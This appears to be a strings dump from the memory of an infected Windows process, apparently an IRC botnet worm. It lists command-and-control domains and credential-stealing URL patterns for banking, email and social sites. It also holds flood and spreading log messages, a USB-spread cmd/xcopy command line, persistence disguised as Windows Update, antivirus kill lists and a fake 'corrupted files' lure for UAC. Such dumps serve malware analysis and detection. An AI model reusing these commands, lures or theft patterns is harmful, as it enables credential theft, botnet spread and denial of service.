Software\Microsoft\Windows\CurrentVersion\RunOnce
WindowsMark
m1xg.org
mxxtxxt.biz
meob.me
%System%\notepad.exe
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0A
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
%s_%d
-%sMutex
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
URLDownloadToFileW
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
Secur32.dll
ShellExecuteA
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
WS2_32.dll
MSVCRT.dll
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
RegNotifyChangeKeyValue
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
7 767<7~7
8*808;8~8
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
shlwapi.dll
crypt32.dll
wtsapi32.dll
samcli.dll
netutils.dll
userenv.dll
WindowsSecondaryDesktop
\charmap.exe
\Windows Media Player\wmprph.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
Aadvapi32.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

svchost.exe_1528_rwx_000C0000_00027000:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
PSSVSSh
RPVSSh
PSSh(
PSSh#
PSSh'
PSSh&
PSSh*
9p.uV

svchost.exe_1528_rwx_000E8000_0006B000:

Opera/9.00 (Windows NT 5.1; U; en)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)
Opera 9.4 (Windows NT 6.1; U; en)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
SbieDll.dll
Software\Classes\CLSID\%s\X
Software\Classes\CLSID\%s\X\%s
0xX
SB:0xX
G:%s_0xX_%c:%s_v1$
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
IEXPLORE.EXE
IE.HTTP
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTPS
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
HTTP\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s
Psapi.dll
%s\%s
Software\Adobe\Acrobat Reader\%s\Privileged
mscoree.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\%u
SOFTWARE\Microsoft\Windows NT\CurrentVersion
nspr4.dll
nss3.dll
Urlmon.dll
URLDownloadToFileW
Netapi32.dll
76487-640-1457236-23837
76487-337-8429955-22614
76487-644-3177037-23510
76497-640-6308873-23835
55274-640-2673064-23950
76487-640-8834005-23195
76487-640-0716662-23535
76487-644-8648466-23106
00426-293-8170032-85146
76487-341-5883812-22420
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup
{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}
snxhk.dll
comctl32.dll
ZwSetValueKey
ZwDeleteValueKey
SOFTWARE\%s
update.microsoft.com
microsoft.com
windowsupdate.microsoft.com
JOIN
PRIVMSG
.rdata
cmd_option.%s
/c %s
cmd.exe
msvcrt.dll
--x-x-x-xx
Content-Type: multipart/form-data; boundary=x-x-x-xx
Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"
%s?action=up&g=%s
xul.dll
<Port>
<Pass>
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
?pid=%d
?page=%d
?id=%u
%s=%u&%s=%s
%s=%s&%s=%u
&%s=%s
&%s%u=
&%s%hu=
&%s=_%u
%d|%s|%s|%s
.info
httpget
GET /%s HTTP/1.1
Host: %s
Content-Length: %d
Accept: %s
Accept-Language: %s
Accept-Charset: %s
Accept-Encoding: %s
User-Agent: %s
Referer: %s
Connection: %s
hXXp://
iexplore.exe
firefox.exe
tbb-firefox.exe
%s:%hu
windowsupdate
SSH2_MSG_KEXINIT
SSH2_MSG_DISCONNECT
SSH2_MSG_USERAUTH_SUCCESS
hXXp://%s%s/image.php?id=%s
TaskDialogIndirect
hXXp://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535
ÐxX
ntdll.dll
kernel32.dll
secur32.dll
crypt32.dll
user32.dll
advapi32.dll
wininet.dll
shell32.dll
shlwapi.dll
ole32.dll
version.dll
sfc.dll
dnsapi.dll
ws2_32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
8"808]9|9
9%9 919<9
=(=/=6==={=
4 4?4^4}4
6o6g6r6w6
9 9$9(90949
.text
`.rdata
@.data
.rsrc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
Invalid parameter passed to C runtime function.
GetProcessWindowStation
USER32.DLL
RegSetKeySecurity
RegEnumKeyA
ADVAPI32.dll
GDI32.dll
GetNamedPipeHandleStateA
CreateIoCompletionPort
DisconnectNamedPipe
GetNamedPipeInfo
PeekNamedPipe
GetProcessHeap
SetProcessShutdownParameters
GetCPInfo
KERNEL32.dll
.EGDF
-TQ}9J3
l.Bt.,
Y%U(q
>.Rm4xon}V^
jdB .toN@&
#)CM%D
qu.kP
{-Qn}-
 %Fj 7
o!L.Zy
.mvry
Ryx.ps
n}.cK
{ww%f
%c;sk
h%S4m
.FdT=
Software\Classes\CLSID\%S
G:%S_0xX
chrome.exe
opera.exe
safari.exe
maxthon.exe
:Mozilla\Firefox\Profiles
cookies.sqlite
%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*
%s\winsxs\%s\comctl32.dll
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s
%s:*:Enabled
avcuf32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
prstrui.exe
Windows Defender
MpClient.dll
Windows Defender\MSASCui.exe
MpSvc.dll
msseces.exe
MsMpEng.exe
MSASCui.exe
MpAsDesc.dll
MsMpLics.dll
avgui.exe
avgidsagent.exe
avgwdsvc.exe
avgdiagex.exe
avgmfapx.exe
avgupd.exe
avgcfgex.exe
avgnt.exe
avguard.exe
avshadow.exe
avcenter.exe
update.dll
updaterc.dll
usrreq.exe
ccsvchst.exe
symerr.exe
NIS.exe
NAV.exe
navw32.exe
avastui.exe
AvastEmUpdate.exe
ashUpd.exe
WRSA.exe
zatray.exe
ForceField.exe
updating.dll
fshoster32.exe
fsaua.dll
PSUNMain.exe
PSUAService.exe
PSANHost.exe
PSUNScan.dll
epavjobs.exe
AVENGINE.exe
Upgrader.exe
adaware.exe
BullGuard.exe.manifest
BullGuardUpdate.exe
BullGuard.exe
BullGuardScanner.exe
BullGuardBhvScanner.exe
BullGuardUpdate2.exe
BgScan.exe
BgScanEngine.dll
.manifest
updater.exe
Backup\RSD\RSSetup\updater.exe
RsTray.exe
RavMonD.exe
RsMgrSvc.exe
rsmain.exe
RsScan.dll
RsTray.dll
mbamgui.exe
mbam.exe
pctsGui.exe
pctsAuxs.exe
pctsSvc.exe
Update.exe
UpdateHlpr.dll
Definitions\vcore.dll
sbamui.exe
SBAMTray.exe
updater_client_mod.dll
FProtTray.exe
FPWin.exe
scf.dat
ALUpdate.exe
update_tmp.exe
arcaclean.exe
BavUpdater.exe
rcfp.exe
CLPSLA.exe
op_mon.exe
niu.exe
K7TSUpdT.exe
sguardxup.exe
ccupdate.exe
caupdate.dll
a2guard.exe
a2start.exe
a2service.exe
AVKTray.exe
GDSC.exe
AVK.exe
GDFirewallTray.exe
Bka.exe
BLuPro.exe
BkavSystemServer.exe
BkavService.exe
LiveUpdate.dll
LiveConnect.dll
BaseFile\Bkav\LiveUpdate.dll
V3Lite.exe
ASDSvc.exe
autoup.exe
downloader.exe
%s.config
updatesrv.exe
updatemgr.dll
egui.exe
ekrn.exe
x86\ekrn.exe
uWinMgr.exe
coreServiceShell.exe
uiSeAgnt.exe
uiWatchDog.exe
plugins\plugUpdater.dll
UiFrmwrk\uiUpdateTray.exe
coreFrameworkHost.exe
mcagent.exe
McSvHost.exe
McUICnt.exe
McPvTray.exe
mcui_exe
mcpltui_exe
mcshell.exe
mcupdmgr.exe
mcupdate.exe
mcshield.exe
mcupdui.dll
McAPExe.exe
.config
Image File Execution Options\%s
SYSTEM\CurrentControlSet\services\%s
%c:\ntusbdriver.sys
%c:\*p.exe
%c:\%s
p.exe
%WinDir%\explorer.exe
/C start /d. %s&"%s"
%COMSPEC%
%WinDir%\system32\shell32.dll
%c:\%s.lnk
VisthAux.exe
explorer.exe
t.minecraft
Works! PID: %d, Name: %s
cmdvirth
%s%s\X
tcp://
svchost.exe
csrss.exe
lsass.exe
smss.exe
wscript.exe
cscript.exe
vbc.exe
rundll32.exe
regsvr32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
winlogon.exe
services.exe
%s\x.lnk
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s
desktop.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
wintrust.dll
chrome.dll
Applications\iexplore.exe\shell\open\command
%s_xx
x.zip
Navw32.exe
SysInspector.exe
avscan.exe
mfefire.exe
wuauclt.exe
WerFault.exe
lFileZilla\sitemanager.xml
port
Sites.dat
Quick.dat
%s\3\%s
%s\4\%s
spoolsv.exe
steam.exe
skype.exe
origin.exe
dwm.exe
tapi3.dll
/C copy "%s" "%s"
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Windows Update Service
"%s" /%s
Software\Microsoft\Windows\CurrentVersion\RunOnce
/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST
schtasks.exe
/DELETE /TN "Windows Update Check - 0xX" /F
\Windows\Explorer.exe
Low_X
%s.manifest
PendingFileRenameOperations
%s\X
Windows\CurrentVersion\Run
CurrentVersion\Windows
Windows NT\CurrentVersion\Image File Execution Options\%s
Windows has encountered a corrupted folder on your hard drive
Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.
Corrupted folder: %s
Corrupted file count: %d
<a href=".ms">%s</a>
/c start "" "%s" /%s "%s"
shell32,ShellExec_RunDLL "%s" /%s "%s"
You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.
Windows 3.1 Update Service
%s:Zone.Identifier
%s\X.pif
KERNEL32.DLL
KERNELBASE.DLL
ekernel32.dll
kernelbase.dll
Website Copier [Offline Browser]
WinHTTrack Website Copier, Copy Websites to Your Computer
3.47.21
WinHTTrack.exe
WinHTTrack Website Copier

svchost.exe_1528_rwx_00170000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\svchost.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

svchost.exe_1528_rwx_00A10000_00029000:

.text
`.data
.rsrc
@.reloc
*windows defender*
*windowsupdate*
*drweb*
dwwin.exe
kernel32.dll
iphlpapi.dll
GetExtendedTcpTable
GetOwnerModuleFromTcpEntry
%systemroot%
%programfiles%\Common Files\*\*.exe
%appdata%\Identities\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
ole32.dll
/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"
/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"
%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe
%SystemRoot%\system32\SHELL32.dll
%s\c731200
%s\%s
%s\%s.lnk
Windows_Shared_Mutex_231_c000100
ntdll.dll
\ScreenSaverPro.scr
\temp.bin
user32.dll
advapi32.dll
shell32.dll
urlmon.dll
wininet.dll
gdi32.dll
rpcrt4.dll
netapi32.dll
*.exe
.gonewiththewings
*.gonewiththewings
WinExec
URLDownloadToFileA
hXXp://VVV.google.com
\calc.exe
\Reader_sl.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
notepad.exe
\notepad.exe
\svchost.exe
WindowsId
Identities\%s
%s\%s\%s.exe
:Zone.Identifier
.quarantined
"%s" -shell
"%s" -bind
userinit.exe
explorer.exe
Windows critical error, require reboot
Windows Update
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
GetProcessHeap
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyA
RegEnumKeyA
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
SetTcpEntry
SHLWAPI.dll
RPCRT4.dll
NETAPI32.dll
DNSAPI.dll
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\WindowsId Manager Reader
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
WindowsMark
m1xg.org
mxxtxxt.biz
meob.me
%System%\notepad.exe
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0A
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
%s_%d
-%sMutex
%s-pid
